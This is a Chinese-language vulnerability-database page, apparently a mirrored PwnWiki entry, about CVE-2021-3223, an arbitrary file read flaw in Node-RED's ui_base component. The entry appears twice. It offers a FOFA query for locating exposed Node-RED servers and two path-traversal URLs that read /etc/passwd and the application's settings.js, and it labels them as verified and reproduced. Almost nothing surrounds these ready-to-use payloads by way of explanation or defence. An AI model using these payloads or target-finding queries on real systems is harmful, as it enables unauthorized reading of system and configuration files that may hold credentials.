CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞-棉花糖会员站

# CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞

{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’該漏洞已通過驗證”’
——
本頁面的EXP/POC/Payload經測試可用，漏洞已經成功復現。
|}

==漏洞影響==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

==參考==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’ 該漏洞已通過驗證”’
——
本頁面的EXP/POC/Payload經測試可用，漏洞已經成功復現。
|}

==漏洞影響==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

==參考==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

文章版权归作者所有，未经允许请勿转载。

THE END

漏洞库

CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞

请登录后发表评论

1明洞 mingdon 0.2.7版本分享

2SPON IP网络对讲广播系统 /php/rj_get_token.php 任意文件读取

3会员站年终抽奖清单出炉！万元奖品在等你哦~

4网络信息安全加固报告模板.docx

5大华智慧园区综合管理平台 access modifyOrg.action 反序列化